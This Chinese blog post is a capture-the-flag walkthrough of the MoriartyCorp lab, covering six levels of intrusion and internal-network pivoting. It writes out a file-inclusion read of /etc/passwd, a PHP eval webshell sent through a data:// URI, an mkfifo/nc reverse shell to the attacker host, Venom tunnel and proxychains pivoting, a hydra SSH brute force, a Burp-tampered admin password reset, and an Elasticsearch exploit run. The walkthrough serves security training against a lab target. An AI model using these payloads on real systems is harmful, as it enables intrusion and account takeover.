靶场MoriartyCorp

  • 第一关8afe2a6c91154659aa403eab5dd98fff.png

     输入flag{start}

  • 第二关dc6a3e31abb64b67a2918d414e1cceee.png

     

  1.  根据提示访问80端口

    65ef19c8b7814492ad0c43e4ab520c88.png
  2. 根据页面链接猜测为文件包含漏洞fae28acb182a487087c8b0f76625ece3.png
  3. 通过下面链接测试文件包含漏洞
    ?file=../../../../../etc/passwd
    8a8a9b6896854381b3755b7c9a8cbac4.png
  4. 使用data伪协议传一句话木马,再用中国蚁剑链接shell
    ?file=data://text/plain,<?php eval($_POST['123'])?>

    7bb1a57d6b70428cb5664096c6ef3043.png

  5.  

    在主目录中发现1_flag.txt文件,获取到flag{the_game_is_on}并提交

     

     

  • 第三关 070ce962a594486bada4784a79ab2fdf.png

  1.  通过提示需要进行内网穿透扫描172.17.0.3-254,首先攻击机开启侦听端口4444
    nc -lvp 4444
  2. 通过下面代码反弹shell,或是安装上一关通过中国蚁剑获取shell
    http://192.168.XXX.XXX/?file=data://text/plain,%3C?php%20$a=$_GET[%22abc%22];exec($a);echo%20$a;?%3E&abc=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2%3E%261|nc+192.168.XXX.XXX+4444+%3E/tmp/f
  3. 共享隧道代理工具venom中的agent_liunx_x64
    cp agent_linux_x64 /var/www/html
    
    service apache2 start
  4. 通过反弹的shell窗口下载
    wget http://192.168.xxx.xxx/agent_linux_x64
  5. 使用隧道代理链接
    攻击端:./admin_linux_x64 -lport 8888
    服务器端:chmod +x agent_linux_x64
             ./agent_linux_x64 -rhost 192.168.xxx.xxx -rport 8888
  6. 获取shell后开启socks5代理
    show
    goto 1
    socks 1080
  7. 配置攻击机proxychains,修改proxychains4.conf的内容最后一行为socks5 172.0.0.1 1080
    nano /etc/proxychains4.conf
  8. 通过namp扫描,浏览器插件挂代理访问172.17.0.4:80525953510fb34badbce0bb37062f16ac.png
  9. 上传一句话,burpsuite爆破密码得到密码password和上传位置./photo/23/php_shell_123.php,中国蚁剑挂代理链接找到2_flag.txt:flag{picture_is_worth_1000_words}

    c48bad05041f4339b8058db7c31f6378.png
  •  第四关a0bd5648db8a4f6593a1684c8a5642bd.png

  1.  通过提示,进行md5解密
    63a9f0ea7bb98050796b649e85481845root
    7b24afc8bc80e548d66c4e7ff72171c5toor
    5f4dcc3b5aa765d61d8327deb882cf99password
    21232f297a57a5a743894a0e4a801fc3admin
    084e0343a0486ff05530df6c705c8bb4guest
    697c6cc76fdbde5baccb7b3400391e30MORIARTY
    8839cfc8a0f24eb155ae3f7f205f5cbcMCORP
    35ac704fe1cc7807c914af478f20fd35mcorp
    b27a803ed346fbbf6d2e2eb88df1c51bweapons
    08552d48aa6d6d9c05dd67f1b4ba8747moriarty

















     

  2. namp 显示172.17.0.5开启了22端口,hydra爆破ssh
    proxychains4 hydra -L user.txt -P password.txt ssh://172.17.0.5
    
    得到账号:root,密码:weapons
     
  3. 登录ssh,获取3_flag.txt内容flag{what_weapons}
    278e632a7b6f41a4b10f8fd6908a6464.png
  •  第五关781da1109f8142559af477422887323c.png

  1.  nmap扫描,访问172.17.0.6:8000,并用提示中的账户密码登录1738d4716d46497db427347d867a8d4a.png
  2. 通过chats页面得知存在账户adminc85aceaebbbf4750af025a4ed6e3c93d.png
  3. 通过change页面修改密码,并用burpsuite抓包修改用户admin的密码为1234561eeab16e9b0e470ebd89f545708c324e.png
  4. 换一个浏览器登录admin账户,得到flag:flag{on_the_move} 5f9f5cadbd084e78a89d9feae6bd8d05.png
  •  第六关c2b6f4464411479aa87c1de28c86936b.png

  1.  elasticsearch的标准服务端口为9200,namp扫描内网,得到ip地址172.17.0.7b7799d564d6f482b9e77927ae5e95cff.png8fe7d5648fa64404bc92a516de1610b2.png
  2. 使用searchsploit命令,然后攻击漏洞,得到flag:flag{game_over}
    searchsploit elasticserarch
    cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
    proxychains4 python2 36337.py 172.17.0.7

     

 

 

 

 

 

 

 

 

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值